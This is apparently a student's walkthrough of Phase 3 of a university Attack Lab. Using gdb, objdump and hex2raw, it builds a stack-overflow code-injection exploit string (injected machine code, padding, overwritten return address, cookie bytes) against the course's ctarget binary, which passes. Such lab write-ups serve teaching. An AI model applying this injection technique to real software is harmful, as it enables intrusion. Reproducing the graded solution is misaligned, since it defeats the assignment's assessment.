Attack Lab: Phase 3
4/23/22Less than 1 minute
Run
$ gdb ctarget --tui
...
(gdb) break getbuf
Breakpoint 1 at 0x401b28: file buf.c, line 12.
(gdb) run -q
Starting program: /home/stu2020012872/3-lab-3-attacklab/target97/ctarget -q
Breakpoint 1, getbuf () at buf.c:12
(gdb) info registers rsp
rsp 0x55668cc0 0x55668cc0Run
objdump --disassemble ctarget > ctarget.asmRead File ctarget.asm
...
0000000000401b28 <getbuf>:
401b28: 48 83 ec 28 sub $0x28,%rsp
...
0000000000401c78 <touch3>:
...Write File phase-3-inject.s
movq $0x55668cc8, %rdi
pushq $0x0000000000401c78
retRun
gcc -c phase-3-inject.s
objdump --disassemble phase-3-inject.o > phase-3-inject.asmRead File phase-3-inject.asm
...
0000000000000000 <.text>:
0: 48 c7 c7 c8 8c 66 55 mov $0x55668cc8,%rdi
7: 68 78 1c 40 00 pushq $0x401c78
c: c3 retqRead File cookie.txt
0x3a9a6c2fConvert Cookie to String
The string should end with a \0.
33 61 39 61 36 63 32 66 00Write File phase-3.txt
Place the string in the parent frame of getbuf, that is, test stack frames.
48 c7 c7 c8 8c 66 55
68 78 1c 40 00
c3
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
98 8c 66 55 00 00 00 00
33 61 39 61 36 63 32 66 00Run
./hex2raw < phase-3.txt > phase-3.in
./ctarget -i phase-3.inTerminal Output
Cookie: 0x3a9a6c2f
Touch3!: You called touch3("3a9a6c2f")
Valid solution for level 3 with target ctarget
PASS: Sent exploit string to server to be validated.
NICE JOB!